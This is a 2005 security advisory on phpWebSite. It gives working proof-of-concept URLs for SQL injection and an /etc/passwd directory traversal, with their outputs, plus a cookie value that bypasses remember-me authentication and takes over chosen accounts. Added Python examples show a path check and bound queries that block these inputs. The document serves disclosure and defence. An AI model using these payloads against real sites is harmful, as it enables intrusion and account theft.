
phpwebsiteSQL.txt

Posted Jul 7, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Phpwebsite suffers from multiple SQL injection flaws and a directory traversal vulnerability. Detailed exploitation provided.

tags | exploit, sql injection
SHA-256 | 72609023a954b0715a52542825a64ed43c292f8cc141424428a1038ad580c36a

Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Phpwebsite has multiple serious vulnerabilities
Date: 7/07/2005

Vendor: Phpwebsite
Vendor Website: http://phpwebsite.appstate.edu
Vendor Status: Contacted and patch has been released
Summary: There are multiple SQL injection, authentication bypass and directory traversal vulnerabilities in Phpwebsite.


Proof of Concept Exploits:

www.example.com/phpwebsite/index.php?module='&search_op=search&mod=all&query=1&search=Search
SQL injection

DB Error: syntax error
SELECT show_block, block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

www.example.com/phpwebsite/index.php?module=search&search_op=search&mod='&query=1&search=Search
SQL injection

DB Error: syntax error
SELECT block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search
Directory traversal

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News
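
The check that stops the `mod` traversal request above, as an added example: this is a Python model written for this page, not phpWebSite's own code or its patch. It assumes module names are plain identifiers and that each module lives in `<base>/<name>/index.php`; both are assumptions, since the advisory does not show how `mod` is turned into a path.

```python
import os
import re
from urllib.parse import parse_qs

# Assumption: module names are plain identifiers (the real rule is not on the page).
MODULE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")

class RejectedModule(ValueError):
    """Raised when the requested module name must not be used to build a path."""

def resolve_module(base_dir, query_string):
    """Map the `mod` request parameter to a file under base_dir, or raise."""
    values = parse_qs(query_string, keep_blank_values=True).get("mod", [])
    if len(values) != 1:
        raise RejectedModule("exactly one mod parameter is required")
    name = values[0]  # parse_qs has already turned %00 into a real NUL byte
    if "\x00" in name:
        raise RejectedModule("NUL byte in module name")
    if not MODULE_NAME.fullmatch(name):
        raise RejectedModule("module name is not a plain identifier")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name, "index.php"))
    # Defence in depth: the resolved path must still sit below the base directory.
    if os.path.commonpath([base, candidate]) != base:
        raise RejectedModule("resolved path escapes the module directory")
    return candidate

def check(base_dir, query_string):
    """Return 'ok' or the rejection reason, for use in logs and tests."""
    try:
        resolve_module(base_dir, query_string)
        return "ok"
    except RejectedModule as exc:
        return str(exc)

# Constructed sample requests; the second and third carry the values shown in the advisory.
SAMPLES = [
    "module=search&search_op=search&mod=all&query=1&search=Search",
    "module=search&search_op=search&mod='&query=1&search=Search",
    "module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(check("/srv/phpwebsite/mod", qs), "<-", qs)  # hypothetical base path
```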

Log into a user account with "remember me" checked, then delete all the cookies except the one with [mod_users][rememberme].
Cookie name: *an MD5 hash set by the website* [mod_users][rememberme]
Value: a' or 'a' = 'a
You can also steal specific user accounts by setting the cookie value as a' or user_id = '5'
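
Why the single quote in `module` and the remember-me cookie value above change the query, and how a bound parameter prevents it, as an added example: this is a Python/sqlite3 model written for this page, not phpWebSite's PHP/MySQL code. The `mod_search` columns come from the error text above; the `users` table, its columns and all rows are constructed assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in database. mod_search columns come from the error text
    in the advisory; the users table and all rows are constructed assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE mod_search (module TEXT, show_block INTEGER, block_title TEXT);
        INSERT INTO mod_search VALUES ('search', 1, 'Search');
        CREATE TABLE users (user_id TEXT, username TEXT, remember_token TEXT);
        INSERT INTO users VALUES ('1', 'alice', 'tok-alice'), ('5', 'admin', 'tok-admin');
    """)
    return db

def run(db, sql, params=()):
    """Return the first row, None for no match, or 'DB Error' on a syntax error."""
    try:
        return db.execute(sql, params).fetchone()
    except sqlite3.OperationalError:
        return "DB Error"

def block_concat(db, module):
    # 'Before' form: request data becomes part of the SQL text.
    return run(db, "SELECT show_block, block_title FROM mod_search WHERE module='" + module + "'")

def block_bound(db, module):
    # 'After' form: the driver sends the value separately from the statement.
    return run(db, "SELECT show_block, block_title FROM mod_search WHERE module=?", (module,))

def remember_concat(db, cookie):
    # 'Before' form of a remember-me lookup (hypothetical query shape).
    return run(db, "SELECT username FROM users WHERE remember_token='" + cookie + "'")

def remember_bound(db, cookie):
    # 'After' form: the cookie is compared as a literal string, quotes included.
    return run(db, "SELECT username FROM users WHERE remember_token=?", (cookie,))

if __name__ == "__main__":
    db = make_db()
    quote, tautology = "'", "a' or 'a' = 'a"  # both values are taken from the advisory
    print(block_concat(db, quote), block_bound(db, quote))
    print(remember_concat(db, tautology), remember_bound(db, tautology))
    print(remember_bound(db, "tok-admin"))
```

In the concatenated form the lone quote reproduces the syntax error shown in the advisory and the tautology returns a user row without a valid token; in the bound form both inputs simply match nothing.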

Solution:
The vendors were contacted via email and responded quickly. The issue was reported to them, after which a patch was released on their official website.

You can get the security patch at http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_patch_20050705.2.tgz

Keep yourself updated: RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon-to-come-out book on secure coding with PHP.

Sincerely,
Diabolic Crab



